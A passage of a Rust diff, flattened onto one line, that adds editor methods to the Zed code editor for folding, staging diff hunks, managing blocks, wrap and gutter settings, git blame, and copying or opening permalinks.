self.display_map.read(cx).is_buffer_folded(buffer) + } + + pub fn folded_buffers<'a>(&self, cx: &'a App) -> &'a HashSet { + self.display_map.read(cx).folded_buffers() + } + + pub fn disable_header_for_buffer(&mut self, buffer_id: BufferId, cx: &mut Context) { + self.display_map.update(cx, |display_map, cx| { + display_map.disable_header_for_buffer(buffer_id, cx); + }); + cx.notify(); + } + + /// Removes any folds with the given ranges. + pub fn remove_folds_with_type( + &mut self, + ranges: &[Range], + type_id: TypeId, + auto_scroll: bool, + cx: &mut Context, + ) { + self.remove_folds_with(ranges, auto_scroll, cx, |map, cx| { + map.remove_folds_with_type(ranges.iter().cloned(), type_id, cx) + }); + self.folds_did_change(cx); + } + + fn remove_folds_with( + &mut self, + ranges: &[Range], + auto_scroll: bool, + cx: &mut Context, + update: impl FnOnce(&mut DisplayMap, &mut Context), + ) { + if ranges.is_empty() { + return; + } + + let mut buffers_affected = HashSet::default(); + let multi_buffer = self.buffer().read(cx); + for range in ranges { + if let Some((_, buffer, _)) = multi_buffer.excerpt_containing(range.start.clone(), cx) { + buffers_affected.insert(buffer.read(cx).remote_id()); + }; + } + + self.display_map.update(cx, update); + + if auto_scroll { + self.request_autoscroll(Autoscroll::fit(), cx); + } + + cx.notify(); + self.scrollbar_marker_state.dirty = true; + self.active_indent_guides_state.dirty = true; + } + + pub fn update_fold_widths( + &mut self, + widths: impl IntoIterator, + cx: &mut Context, + ) -> bool { + self.display_map + .update(cx, |map, cx| map.update_fold_widths(widths, cx)) + } + + pub fn default_fold_placeholder(&self, cx: &App) -> FoldPlaceholder { + self.display_map.read(cx).fold_placeholder.clone() + } + + pub fn set_expand_all_diff_hunks(&mut self, cx: &mut App) { + self.buffer.update(cx, |buffer, cx| { + buffer.set_all_diff_hunks_expanded(cx); + }); + } + + pub fn expand_all_diff_hunks( + &mut self, + _: &ExpandAllDiffHunks, + _window: &mut Window, + cx: &mut Context, + ) { + self.buffer.update(cx, |buffer, cx| { + buffer.expand_diff_hunks(vec![Anchor::min()..Anchor::max()], cx) + }); + } + + pub fn toggle_selected_diff_hunks( + &mut self, + _: &ToggleSelectedDiffHunks, + _window: &mut Window, + cx: &mut Context, + ) { + let ranges: Vec<_> = self.selections.disjoint.iter().map(|s| s.range()).collect(); + self.toggle_diff_hunks_in_ranges(ranges, cx); + } + + pub fn diff_hunks_in_ranges<'a>( + &'a self, + ranges: &'a [Range], + buffer: &'a MultiBufferSnapshot, + ) -> impl 'a + Iterator { + ranges.iter().flat_map(move |range| { + let end_excerpt_id = range.end.excerpt_id; + let range = range.to_point(buffer); + let mut peek_end = range.end; + if range.end.row < buffer.max_row().0 { + peek_end = Point::new(range.end.row + 1, 0); + } + buffer + .diff_hunks_in_range(range.start..peek_end) + .filter(move |hunk| hunk.excerpt_id.cmp(&end_excerpt_id, buffer).is_le()) + }) + } + + pub fn has_stageable_diff_hunks_in_ranges( + &self, + ranges: &[Range], + snapshot: &MultiBufferSnapshot, + ) -> bool { + let mut hunks = self.diff_hunks_in_ranges(ranges, &snapshot); + hunks.any(|hunk| hunk.status().has_secondary_hunk()) + } + + pub fn toggle_staged_selected_diff_hunks( + &mut self, + _: &::git::ToggleStaged, + _: &mut Window, + cx: &mut Context, + ) { + let snapshot = self.buffer.read(cx).snapshot(cx); + let ranges: Vec<_> = self.selections.disjoint.iter().map(|s| s.range()).collect(); + let stage = self.has_stageable_diff_hunks_in_ranges(&ranges, &snapshot); + self.stage_or_unstage_diff_hunks(stage, ranges, cx); + } + + pub fn set_render_diff_hunk_controls( + &mut self, + render_diff_hunk_controls: RenderDiffHunkControlsFn, + cx: &mut Context, + ) { + self.render_diff_hunk_controls = render_diff_hunk_controls; + cx.notify(); + } + + pub fn stage_and_next( + &mut self, + _: &::git::StageAndNext, + window: &mut Window, + cx: &mut Context, + ) { + self.do_stage_or_unstage_and_next(true, window, cx); + } + + pub fn unstage_and_next( + &mut self, + _: &::git::UnstageAndNext, + window: &mut Window, + cx: &mut Context, + ) { + self.do_stage_or_unstage_and_next(false, window, cx); + } + + pub fn stage_or_unstage_diff_hunks( + &mut self, + stage: bool, + ranges: Vec>, + cx: &mut Context, + ) { + let task = self.save_buffers_for_ranges_if_needed(&ranges, cx); + cx.spawn(async move |this, cx| { + task.await?; + this.update(cx, |this, cx| { + let snapshot = this.buffer.read(cx).snapshot(cx); + let chunk_by = this + .diff_hunks_in_ranges(&ranges, &snapshot) + .chunk_by(|hunk| hunk.buffer_id); + for (buffer_id, hunks) in &chunk_by { + this.do_stage_or_unstage(stage, buffer_id, hunks, cx); + } + }) + }) + .detach_and_log_err(cx); + } + + fn save_buffers_for_ranges_if_needed( + &mut self, + ranges: &[Range], + cx: &mut Context, + ) -> Task> { + let multibuffer = self.buffer.read(cx); + let snapshot = multibuffer.read(cx); + let buffer_ids: HashSet<_> = ranges + .iter() + .flat_map(|range| snapshot.buffer_ids_for_range(range.clone())) + .collect(); + drop(snapshot); + + let mut buffers = HashSet::default(); + for buffer_id in buffer_ids { + if let Some(buffer_entity) = multibuffer.buffer(buffer_id) { + let buffer = buffer_entity.read(cx); + if buffer.file().is_some_and(|file| file.disk_state().exists()) && buffer.is_dirty() + { + buffers.insert(buffer_entity); + } + } + } + + if let Some(project) = &self.project { + project.update(cx, |project, cx| project.save_buffers(buffers, cx)) + } else { + Task::ready(Ok(())) + } + } + + fn do_stage_or_unstage_and_next( + &mut self, + stage: bool, + window: &mut Window, + cx: &mut Context, + ) { + let ranges = self.selections.disjoint_anchor_ranges().collect::>(); + + if ranges.iter().any(|range| range.start != range.end) { + self.stage_or_unstage_diff_hunks(stage, ranges, cx); + return; + } + + self.stage_or_unstage_diff_hunks(stage, ranges, cx); + let snapshot = self.snapshot(window, cx); + let position = self.selections.newest::(cx).head(); + let mut row = snapshot + .buffer_snapshot + .diff_hunks_in_range(position..snapshot.buffer_snapshot.max_point()) + .find(|hunk| hunk.row_range.start.0 > position.row) + .map(|hunk| hunk.row_range.start); + + let all_diff_hunks_expanded = self.buffer().read(cx).all_diff_hunks_expanded(); + // Outside of the project diff editor, wrap around to the beginning. + if !all_diff_hunks_expanded { + row = row.or_else(|| { + snapshot + .buffer_snapshot + .diff_hunks_in_range(Point::zero()..position) + .find(|hunk| hunk.row_range.end.0 < position.row) + .map(|hunk| hunk.row_range.start) + }); + } + + if let Some(row) = row { + let destination = Point::new(row.0, 0); + let autoscroll = Autoscroll::center(); + + self.unfold_ranges(&[destination..destination], false, false, cx); + self.change_selections(Some(autoscroll), window, cx, |s| { + s.select_ranges([destination..destination]); + }); + } + } + + fn do_stage_or_unstage( + &self, + stage: bool, + buffer_id: BufferId, + hunks: impl Iterator, + cx: &mut App, + ) -> Option<()> { + let project = self.project.as_ref()?; + let buffer = project.read(cx).buffer_for_id(buffer_id, cx)?; + let diff = self.buffer.read(cx).diff_for(buffer_id)?; + let buffer_snapshot = buffer.read(cx).snapshot(); + let file_exists = buffer_snapshot + .file() + .is_some_and(|file| file.disk_state().exists()); + diff.update(cx, |diff, cx| { + diff.stage_or_unstage_hunks( + stage, + &hunks + .map(|hunk| buffer_diff::DiffHunk { + buffer_range: hunk.buffer_range, + diff_base_byte_range: hunk.diff_base_byte_range, + secondary_status: hunk.secondary_status, + range: Point::zero()..Point::zero(), // unused + }) + .collect::>(), + &buffer_snapshot, + file_exists, + cx, + ) + }); + None + } + + pub fn expand_selected_diff_hunks(&mut self, cx: &mut Context) { + let ranges: Vec<_> = self.selections.disjoint.iter().map(|s| s.range()).collect(); + self.buffer + .update(cx, |buffer, cx| buffer.expand_diff_hunks(ranges, cx)) + } + + pub fn clear_expanded_diff_hunks(&mut self, cx: &mut Context) -> bool { + self.buffer.update(cx, |buffer, cx| { + let ranges = vec![Anchor::min()..Anchor::max()]; + if !buffer.all_diff_hunks_expanded() + && buffer.has_expanded_diff_hunks_in_ranges(&ranges, cx) + { + buffer.collapse_diff_hunks(ranges, cx); + true + } else { + false + } + }) + } + + fn toggle_diff_hunks_in_ranges( + &mut self, + ranges: Vec>, + cx: &mut Context, + ) { + self.buffer.update(cx, |buffer, cx| { + let expand = !buffer.has_expanded_diff_hunks_in_ranges(&ranges, cx); + buffer.expand_or_collapse_diff_hunks(ranges, expand, cx); + }) + } + + fn toggle_single_diff_hunk(&mut self, range: Range, cx: &mut Context) { + self.buffer.update(cx, |buffer, cx| { + let snapshot = buffer.snapshot(cx); + let excerpt_id = range.end.excerpt_id; + let point_range = range.to_point(&snapshot); + let expand = !buffer.single_hunk_is_expanded(range, cx); + buffer.expand_or_collapse_diff_hunks_inner([(point_range, excerpt_id)], expand, cx); + }) + } + + pub(crate) fn apply_all_diff_hunks( + &mut self, + _: &ApplyAllDiffHunks, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + + let buffers = self.buffer.read(cx).all_buffers(); + for branch_buffer in buffers { + branch_buffer.update(cx, |branch_buffer, cx| { + branch_buffer.merge_into_base(Vec::new(), cx); + }); + } + + if let Some(project) = self.project.clone() { + self.save(true, project, window, cx).detach_and_log_err(cx); + } + } + + pub(crate) fn apply_selected_diff_hunks( + &mut self, + _: &ApplyDiffHunk, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + let snapshot = self.snapshot(window, cx); + let hunks = snapshot.hunks_for_ranges(self.selections.ranges(cx)); + let mut ranges_by_buffer = HashMap::default(); + self.transact(window, cx, |editor, _window, cx| { + for hunk in hunks { + if let Some(buffer) = editor.buffer.read(cx).buffer(hunk.buffer_id) { + ranges_by_buffer + .entry(buffer.clone()) + .or_insert_with(Vec::new) + .push(hunk.buffer_range.to_offset(buffer.read(cx))); + } + } + + for (buffer, ranges) in ranges_by_buffer { + buffer.update(cx, |buffer, cx| { + buffer.merge_into_base(ranges, cx); + }); + } + }); + + if let Some(project) = self.project.clone() { + self.save(true, project, window, cx).detach_and_log_err(cx); + } + } + + pub fn set_gutter_hovered(&mut self, hovered: bool, cx: &mut Context) { + if hovered != self.gutter_hovered { + self.gutter_hovered = hovered; + cx.notify(); + } + } + + pub fn insert_blocks( + &mut self, + blocks: impl IntoIterator>, + autoscroll: Option, + cx: &mut Context, + ) -> Vec { + let blocks = self + .display_map + .update(cx, |display_map, cx| display_map.insert_blocks(blocks, cx)); + if let Some(autoscroll) = autoscroll { + self.request_autoscroll(autoscroll, cx); + } + cx.notify(); + blocks + } + + pub fn resize_blocks( + &mut self, + heights: HashMap, + autoscroll: Option, + cx: &mut Context, + ) { + self.display_map + .update(cx, |display_map, cx| display_map.resize_blocks(heights, cx)); + if let Some(autoscroll) = autoscroll { + self.request_autoscroll(autoscroll, cx); + } + cx.notify(); + } + + pub fn replace_blocks( + &mut self, + renderers: HashMap, + autoscroll: Option, + cx: &mut Context, + ) { + self.display_map + .update(cx, |display_map, _cx| display_map.replace_blocks(renderers)); + if let Some(autoscroll) = autoscroll { + self.request_autoscroll(autoscroll, cx); + } + cx.notify(); + } + + pub fn remove_blocks( + &mut self, + block_ids: HashSet, + autoscroll: Option, + cx: &mut Context, + ) { + self.display_map.update(cx, |display_map, cx| { + display_map.remove_blocks(block_ids, cx) + }); + if let Some(autoscroll) = autoscroll { + self.request_autoscroll(autoscroll, cx); + } + cx.notify(); + } + + pub fn row_for_block( + &self, + block_id: CustomBlockId, + cx: &mut Context, + ) -> Option { + self.display_map + .update(cx, |map, cx| map.row_for_block(block_id, cx)) + } + + pub(crate) fn set_focused_block(&mut self, focused_block: FocusedBlock) { + self.focused_block = Some(focused_block); + } + + pub(crate) fn take_focused_block(&mut self) -> Option { + self.focused_block.take() + } + + pub fn insert_creases( + &mut self, + creases: impl IntoIterator>, + cx: &mut Context, + ) -> Vec { + self.display_map + .update(cx, |map, cx| map.insert_creases(creases, cx)) + } + + pub fn remove_creases( + &mut self, + ids: impl IntoIterator, + cx: &mut Context, + ) { + self.display_map + .update(cx, |map, cx| map.remove_creases(ids, cx)); + } + + pub fn longest_row(&self, cx: &mut App) -> DisplayRow { + self.display_map + .update(cx, |map, cx| map.snapshot(cx)) + .longest_row() + } + + pub fn max_point(&self, cx: &mut App) -> DisplayPoint { + self.display_map + .update(cx, |map, cx| map.snapshot(cx)) + .max_point() + } + + pub fn text(&self, cx: &App) -> String { + self.buffer.read(cx).read(cx).text() + } + + pub fn is_empty(&self, cx: &App) -> bool { + self.buffer.read(cx).read(cx).is_empty() + } + + pub fn text_option(&self, cx: &App) -> Option { + let text = self.text(cx); + let text = text.trim(); + + if text.is_empty() { + return None; + } + + Some(text.to_string()) + } + + pub fn set_text( + &mut self, + text: impl Into>, + window: &mut Window, + cx: &mut Context, + ) { + self.transact(window, cx, |this, _, cx| { + this.buffer + .read(cx) + .as_singleton() + .expect("you can only call set_text on editors for singleton buffers") + .update(cx, |buffer, cx| buffer.set_text(text, cx)); + }); + } + + pub fn display_text(&self, cx: &mut App) -> String { + self.display_map + .update(cx, |map, cx| map.snapshot(cx)) + .text() + } + + pub fn wrap_guides(&self, cx: &App) -> SmallVec<[(usize, bool); 2]> { + let mut wrap_guides = smallvec::smallvec![]; + + if self.show_wrap_guides == Some(false) { + return wrap_guides; + } + + let settings = self.buffer.read(cx).language_settings(cx); + if settings.show_wrap_guides { + match self.soft_wrap_mode(cx) { + SoftWrap::Column(soft_wrap) => { + wrap_guides.push((soft_wrap as usize, true)); + } + SoftWrap::Bounded(soft_wrap) => { + wrap_guides.push((soft_wrap as usize, true)); + } + SoftWrap::GitDiff | SoftWrap::None | SoftWrap::EditorWidth => {} + } + wrap_guides.extend(settings.wrap_guides.iter().map(|guide| (*guide, false))) + } + + wrap_guides + } + + pub fn soft_wrap_mode(&self, cx: &App) -> SoftWrap { + let settings = self.buffer.read(cx).language_settings(cx); + let mode = self.soft_wrap_mode_override.unwrap_or(settings.soft_wrap); + match mode { + language_settings::SoftWrap::PreferLine | language_settings::SoftWrap::None => { + SoftWrap::None + } + language_settings::SoftWrap::EditorWidth => SoftWrap::EditorWidth, + language_settings::SoftWrap::PreferredLineLength => { + SoftWrap::Column(settings.preferred_line_length) + } + language_settings::SoftWrap::Bounded => { + SoftWrap::Bounded(settings.preferred_line_length) + } + } + } + + pub fn set_soft_wrap_mode( + &mut self, + mode: language_settings::SoftWrap, + + cx: &mut Context, + ) { + self.soft_wrap_mode_override = Some(mode); + cx.notify(); + } + + pub fn set_hard_wrap(&mut self, hard_wrap: Option, cx: &mut Context) { + self.hard_wrap = hard_wrap; + cx.notify(); + } + + pub fn set_text_style_refinement(&mut self, style: TextStyleRefinement) { + self.text_style_refinement = Some(style); + } + + /// called by the Element so we know what style we were most recently rendered with. + pub(crate) fn set_style( + &mut self, + style: EditorStyle, + window: &mut Window, + cx: &mut Context, + ) { + let rem_size = window.rem_size(); + self.display_map.update(cx, |map, cx| { + map.set_font( + style.text.font(), + style.text.font_size.to_pixels(rem_size), + cx, + ) + }); + self.style = Some(style); + } + + pub fn style(&self) -> Option<&EditorStyle> { + self.style.as_ref() + } + + // Called by the element. This method is not designed to be called outside of the editor + // element's layout code because it does not notify when rewrapping is computed synchronously. + pub(crate) fn set_wrap_width(&self, width: Option, cx: &mut App) -> bool { + self.display_map + .update(cx, |map, cx| map.set_wrap_width(width, cx)) + } + + pub fn set_soft_wrap(&mut self) { + self.soft_wrap_mode_override = Some(language_settings::SoftWrap::EditorWidth) + } + + pub fn toggle_soft_wrap(&mut self, _: &ToggleSoftWrap, _: &mut Window, cx: &mut Context) { + if self.soft_wrap_mode_override.is_some() { + self.soft_wrap_mode_override.take(); + } else { + let soft_wrap = match self.soft_wrap_mode(cx) { + SoftWrap::GitDiff => return, + SoftWrap::None => language_settings::SoftWrap::EditorWidth, + SoftWrap::EditorWidth | SoftWrap::Column(_) | SoftWrap::Bounded(_) => { + language_settings::SoftWrap::None + } + }; + self.soft_wrap_mode_override = Some(soft_wrap); + } + cx.notify(); + } + + pub fn toggle_tab_bar(&mut self, _: &ToggleTabBar, _: &mut Window, cx: &mut Context) { + let Some(workspace) = self.workspace() else { + return; + }; + let fs = workspace.read(cx).app_state().fs.clone(); + let current_show = TabBarSettings::get_global(cx).show; + update_settings_file::(fs, cx, move |setting, _| { + setting.show = Some(!current_show); + }); + } + + pub fn toggle_indent_guides( + &mut self, + _: &ToggleIndentGuides, + _: &mut Window, + cx: &mut Context, + ) { + let currently_enabled = self.should_show_indent_guides().unwrap_or_else(|| { + self.buffer + .read(cx) + .language_settings(cx) + .indent_guides + .enabled + }); + self.show_indent_guides = Some(!currently_enabled); + cx.notify(); + } + + fn should_show_indent_guides(&self) -> Option { + self.show_indent_guides + } + + pub fn toggle_line_numbers( + &mut self, + _: &ToggleLineNumbers, + _: &mut Window, + cx: &mut Context, + ) { + let mut editor_settings = EditorSettings::get_global(cx).clone(); + editor_settings.gutter.line_numbers = !editor_settings.gutter.line_numbers; + EditorSettings::override_global(editor_settings, cx); + } + + pub fn line_numbers_enabled(&self, cx: &App) -> bool { + if let Some(show_line_numbers) = self.show_line_numbers { + return show_line_numbers; + } + EditorSettings::get_global(cx).gutter.line_numbers + } + + pub fn should_use_relative_line_numbers(&self, cx: &mut App) -> bool { + self.use_relative_line_numbers + .unwrap_or(EditorSettings::get_global(cx).relative_line_numbers) + } + + pub fn toggle_relative_line_numbers( + &mut self, + _: &ToggleRelativeLineNumbers, + _: &mut Window, + cx: &mut Context, + ) { + let is_relative = self.should_use_relative_line_numbers(cx); + self.set_relative_line_number(Some(!is_relative), cx) + } + + pub fn set_relative_line_number(&mut self, is_relative: Option, cx: &mut Context) { + self.use_relative_line_numbers = is_relative; + cx.notify(); + } + + pub fn set_show_gutter(&mut self, show_gutter: bool, cx: &mut Context) { + self.show_gutter = show_gutter; + cx.notify(); + } + + pub fn set_show_scrollbars(&mut self, show_scrollbars: bool, cx: &mut Context) { + self.show_scrollbars = show_scrollbars; + cx.notify(); + } + + pub fn disable_scrolling(&mut self, cx: &mut Context) { + self.disable_scrolling = true; + cx.notify(); + } + + pub fn set_show_line_numbers(&mut self, show_line_numbers: bool, cx: &mut Context) { + self.show_line_numbers = Some(show_line_numbers); + cx.notify(); + } + + pub fn disable_expand_excerpt_buttons(&mut self, cx: &mut Context) { + self.disable_expand_excerpt_buttons = true; + cx.notify(); + } + + pub fn set_show_git_diff_gutter(&mut self, show_git_diff_gutter: bool, cx: &mut Context) { + self.show_git_diff_gutter = Some(show_git_diff_gutter); + cx.notify(); + } + + pub fn set_show_code_actions(&mut self, show_code_actions: bool, cx: &mut Context) { + self.show_code_actions = Some(show_code_actions); + cx.notify(); + } + + pub fn set_show_runnables(&mut self, show_runnables: bool, cx: &mut Context) { + self.show_runnables = Some(show_runnables); + cx.notify(); + } + + pub fn set_show_breakpoints(&mut self, show_breakpoints: bool, cx: &mut Context) { + self.show_breakpoints = Some(show_breakpoints); + cx.notify(); + } + + pub fn set_masked(&mut self, masked: bool, cx: &mut Context) { + if self.display_map.read(cx).masked != masked { + self.display_map.update(cx, |map, _| map.masked = masked); + } + cx.notify() + } + + pub fn set_show_wrap_guides(&mut self, show_wrap_guides: bool, cx: &mut Context) { + self.show_wrap_guides = Some(show_wrap_guides); + cx.notify(); + } + + pub fn set_show_indent_guides(&mut self, show_indent_guides: bool, cx: &mut Context) { + self.show_indent_guides = Some(show_indent_guides); + cx.notify(); + } + + pub fn working_directory(&self, cx: &App) -> Option { + if let Some(buffer) = self.buffer().read(cx).as_singleton() { + if let Some(file) = buffer.read(cx).file().and_then(|f| f.as_local()) { + if let Some(dir) = file.abs_path(cx).parent() { + return Some(dir.to_owned()); + } + } + + if let Some(project_path) = buffer.read(cx).project_path(cx) { + return Some(project_path.path.to_path_buf()); + } + } + + None + } + + fn target_file<'a>(&self, cx: &'a App) -> Option<&'a dyn language::LocalFile> { + self.active_excerpt(cx)? + .1 + .read(cx) + .file() + .and_then(|f| f.as_local()) + } + + pub fn target_file_abs_path(&self, cx: &mut Context) -> Option { + self.active_excerpt(cx).and_then(|(_, buffer, _)| { + let buffer = buffer.read(cx); + if let Some(project_path) = buffer.project_path(cx) { + let project = self.project.as_ref()?.read(cx); + project.absolute_path(&project_path, cx) + } else { + buffer + .file() + .and_then(|file| file.as_local().map(|file| file.abs_path(cx))) + } + }) + } + + fn target_file_path(&self, cx: &mut Context) -> Option { + self.active_excerpt(cx).and_then(|(_, buffer, _)| { + let project_path = buffer.read(cx).project_path(cx)?; + let project = self.project.as_ref()?.read(cx); + let entry = project.entry_for_path(&project_path, cx)?; + let path = entry.path.to_path_buf(); + Some(path) + }) + } + + pub fn reveal_in_finder( + &mut self, + _: &RevealInFileManager, + _window: &mut Window, + cx: &mut Context, + ) { + if let Some(target) = self.target_file(cx) { + cx.reveal_path(&target.abs_path(cx)); + } + } + + pub fn copy_path( + &mut self, + _: &zed_actions::workspace::CopyPath, + _window: &mut Window, + cx: &mut Context, + ) { + if let Some(path) = self.target_file_abs_path(cx) { + if let Some(path) = path.to_str() { + cx.write_to_clipboard(ClipboardItem::new_string(path.to_string())); + } + } + } + + pub fn copy_relative_path( + &mut self, + _: &zed_actions::workspace::CopyRelativePath, + _window: &mut Window, + cx: &mut Context, + ) { + if let Some(path) = self.target_file_path(cx) { + if let Some(path) = path.to_str() { + cx.write_to_clipboard(ClipboardItem::new_string(path.to_string())); + } + } + } + + pub fn project_path(&self, cx: &App) -> Option { + if let Some(buffer) = self.buffer.read(cx).as_singleton() { + buffer.read(cx).project_path(cx) + } else { + None + } + } + + // Returns true if the editor handled a go-to-line request + pub fn go_to_active_debug_line(&mut self, window: &mut Window, cx: &mut Context) -> bool { + maybe!({ + let breakpoint_store = self.breakpoint_store.as_ref()?; + + let Some(active_stack_frame) = breakpoint_store.read(cx).active_position().cloned() + else { + self.clear_row_highlights::(); + return None; + }; + + let position = active_stack_frame.position; + let buffer_id = position.buffer_id?; + let snapshot = self + .project + .as_ref()? + .read(cx) + .buffer_for_id(buffer_id, cx)? + .read(cx) + .snapshot(); + + let mut handled = false; + for (id, ExcerptRange { context, .. }) in + self.buffer.read(cx).excerpts_for_buffer(buffer_id, cx) + { + if context.start.cmp(&position, &snapshot).is_ge() + || context.end.cmp(&position, &snapshot).is_lt() + { + continue; + } + let snapshot = self.buffer.read(cx).snapshot(cx); + let multibuffer_anchor = snapshot.anchor_in_excerpt(id, position)?; + + handled = true; + self.clear_row_highlights::(); + self.go_to_line::( + multibuffer_anchor, + Some(cx.theme().colors().editor_debugger_active_line_background), + window, + cx, + ); + + cx.notify(); + } + + handled.then_some(()) + }) + .is_some() + } + + pub fn copy_file_name_without_extension( + &mut self, + _: &CopyFileNameWithoutExtension, + _: &mut Window, + cx: &mut Context, + ) { + if let Some(file) = self.target_file(cx) { + if let Some(file_stem) = file.path().file_stem() { + if let Some(name) = file_stem.to_str() { + cx.write_to_clipboard(ClipboardItem::new_string(name.to_string())); + } + } + } + } + + pub fn copy_file_name(&mut self, _: &CopyFileName, _: &mut Window, cx: &mut Context) { + if let Some(file) = self.target_file(cx) { + if let Some(file_name) = file.path().file_name() { + if let Some(name) = file_name.to_str() { + cx.write_to_clipboard(ClipboardItem::new_string(name.to_string())); + } + } + } + } + + pub fn toggle_git_blame( + &mut self, + _: &::git::Blame, + window: &mut Window, + cx: &mut Context, + ) { + self.show_git_blame_gutter = !self.show_git_blame_gutter; + + if self.show_git_blame_gutter && !self.has_blame_entries(cx) { + self.start_git_blame(true, window, cx); + } + + cx.notify(); + } + + pub fn toggle_git_blame_inline( + &mut self, + _: &ToggleGitBlameInline, + window: &mut Window, + cx: &mut Context, + ) { + self.toggle_git_blame_inline_internal(true, window, cx); + cx.notify(); + } + + pub fn open_git_blame_commit( + &mut self, + _: &OpenGitBlameCommit, + window: &mut Window, + cx: &mut Context, + ) { + self.open_git_blame_commit_internal(window, cx); + } + + fn open_git_blame_commit_internal( + &mut self, + window: &mut Window, + cx: &mut Context, + ) -> Option<()> { + let blame = self.blame.as_ref()?; + let snapshot = self.snapshot(window, cx); + let cursor = self.selections.newest::(cx).head(); + let (buffer, point, _) = snapshot.buffer_snapshot.point_to_buffer_point(cursor)?; + let blame_entry = blame + .update(cx, |blame, cx| { + blame + .blame_for_rows( + &[RowInfo { + buffer_id: Some(buffer.remote_id()), + buffer_row: Some(point.row), + ..Default::default() + }], + cx, + ) + .next() + }) + .flatten()?; + let renderer = cx.global::().0.clone(); + let repo = blame.read(cx).repository(cx)?; + let workspace = self.workspace()?.downgrade(); + renderer.open_blame_commit(blame_entry, repo, workspace, window, cx); + None + } + + pub fn git_blame_inline_enabled(&self) -> bool { + self.git_blame_inline_enabled + } + + pub fn toggle_selection_menu( + &mut self, + _: &ToggleSelectionMenu, + _: &mut Window, + cx: &mut Context, + ) { + self.show_selection_menu = self + .show_selection_menu + .map(|show_selections_menu| !show_selections_menu) + .or_else(|| Some(!EditorSettings::get_global(cx).toolbar.selections_menu)); + + cx.notify(); + } + + pub fn selection_menu_enabled(&self, cx: &App) -> bool { + self.show_selection_menu + .unwrap_or_else(|| EditorSettings::get_global(cx).toolbar.selections_menu) + } + + fn start_git_blame( + &mut self, + user_triggered: bool, + window: &mut Window, + cx: &mut Context, + ) { + if let Some(project) = self.project.as_ref() { + let Some(buffer) = self.buffer().read(cx).as_singleton() else { + return; + }; + + if buffer.read(cx).file().is_none() { + return; + } + + let focused = self.focus_handle(cx).contains_focused(window, cx); + + let project = project.clone(); + let blame = cx.new(|cx| GitBlame::new(buffer, project, user_triggered, focused, cx)); + self.blame_subscription = + Some(cx.observe_in(&blame, window, |_, _, _, cx| cx.notify())); + self.blame = Some(blame); + } + } + + fn toggle_git_blame_inline_internal( + &mut self, + user_triggered: bool, + window: &mut Window, + cx: &mut Context, + ) { + if self.git_blame_inline_enabled { + self.git_blame_inline_enabled = false; + self.show_git_blame_inline = false; + self.show_git_blame_inline_delay_task.take(); + } else { + self.git_blame_inline_enabled = true; + self.start_git_blame_inline(user_triggered, window, cx); + } + + cx.notify(); + } + + fn start_git_blame_inline( + &mut self, + user_triggered: bool, + window: &mut Window, + cx: &mut Context, + ) { + self.start_git_blame(user_triggered, window, cx); + + if ProjectSettings::get_global(cx) + .git + .inline_blame_delay() + .is_some() + { + self.start_inline_blame_timer(window, cx); + } else { + self.show_git_blame_inline = true + } + } + + pub fn blame(&self) -> Option<&Entity> { + self.blame.as_ref() + } + + pub fn show_git_blame_gutter(&self) -> bool { + self.show_git_blame_gutter + } + + pub fn render_git_blame_gutter(&self, cx: &App) -> bool { + self.show_git_blame_gutter && self.has_blame_entries(cx) + } + + pub fn render_git_blame_inline(&self, window: &Window, cx: &App) -> bool { + self.show_git_blame_inline + && (self.focus_handle.is_focused(window) || self.inline_blame_popover.is_some()) + && !self.newest_selection_head_on_empty_line(cx) + && self.has_blame_entries(cx) + } + + fn has_blame_entries(&self, cx: &App) -> bool { + self.blame() + .map_or(false, |blame| blame.read(cx).has_generated_entries()) + } + + fn newest_selection_head_on_empty_line(&self, cx: &App) -> bool { + let cursor_anchor = self.selections.newest_anchor().head(); + + let snapshot = self.buffer.read(cx).snapshot(cx); + let buffer_row = MultiBufferRow(cursor_anchor.to_point(&snapshot).row); + + snapshot.line_len(buffer_row) == 0 + } + + fn get_permalink_to_line(&self, cx: &mut Context) -> Task> { + let buffer_and_selection = maybe!({ + let selection = self.selections.newest::(cx); + let selection_range = selection.range(); + + let multi_buffer = self.buffer().read(cx); + let multi_buffer_snapshot = multi_buffer.snapshot(cx); + let buffer_ranges = multi_buffer_snapshot.range_to_buffer_ranges(selection_range); + + let (buffer, range, _) = if selection.reversed { + buffer_ranges.first() + } else { + buffer_ranges.last() + }?; + + let selection = text::ToPoint::to_point(&range.start, &buffer).row + ..text::ToPoint::to_point(&range.end, &buffer).row; + Some(( + multi_buffer.buffer(buffer.remote_id()).unwrap().clone(), + selection, + )) + }); + + let Some((buffer, selection)) = buffer_and_selection else { + return Task::ready(Err(anyhow!("failed to determine buffer and selection"))); + }; + + let Some(project) = self.project.as_ref() else { + return Task::ready(Err(anyhow!("editor does not have project"))); + }; + + project.update(cx, |project, cx| { + project.get_permalink_to_line(&buffer, selection, cx) + }) + } + + pub fn copy_permalink_to_line( + &mut self, + _: &CopyPermalinkToLine, + window: &mut Window, + cx: &mut Context, + ) { + let permalink_task = self.get_permalink_to_line(cx); + let workspace = self.workspace(); + + cx.spawn_in(window, async move |_, cx| match permalink_task.await { + Ok(permalink) => { + cx.update(|_, cx| { + cx.write_to_clipboard(ClipboardItem::new_string(permalink.to_string())); + }) + .ok(); + } + Err(err) => { + let message = format!("Failed to copy permalink: {err}"); + + anyhow::Result::<()>::Err(err).log_err(); + + if let Some(workspace) = workspace { + workspace + .update_in(cx, |workspace, _, cx| { + struct CopyPermalinkToLine; + + workspace.show_toast( + Toast::new( + NotificationId::unique::(), + message, + ), + cx, + ) + }) + .ok(); + } + } + }) + .detach(); + } + + pub fn copy_file_location( + &mut self, + _: &CopyFileLocation, + _: &mut Window, + cx: &mut Context, + ) { + let selection = self.selections.newest::(cx).start.row + 1; + if let Some(file) = self.target_file(cx) { + if let Some(path) = file.path().to_str() { + cx.write_to_clipboard(ClipboardItem::new_string(format!("{path}:{selection}"))); + } + } + } + + pub fn open_permalink_to_line( + &mut self, + _: &OpenPermalinkToLine, + window: &mut Window, + cx: &mut Context, + ) { + let permalink_task = self.get_permalink_to_line(cx); + let workspace = self.workspace(); + + cx.spawn_in(window, async move |_, cx| match permalink_task.await { + Ok(permalink) => { + cx.update(|_, cx| { + cx.open_url(permalink.as_ref()); + }) + .ok(); + } + Err(err) => { + let message = format!("Failed to open permalink: {err}"); + + anyhow::Result::<()>::Err(err).log_err(); + + if let Some(workspace) = workspace { + workspace + .update(cx, 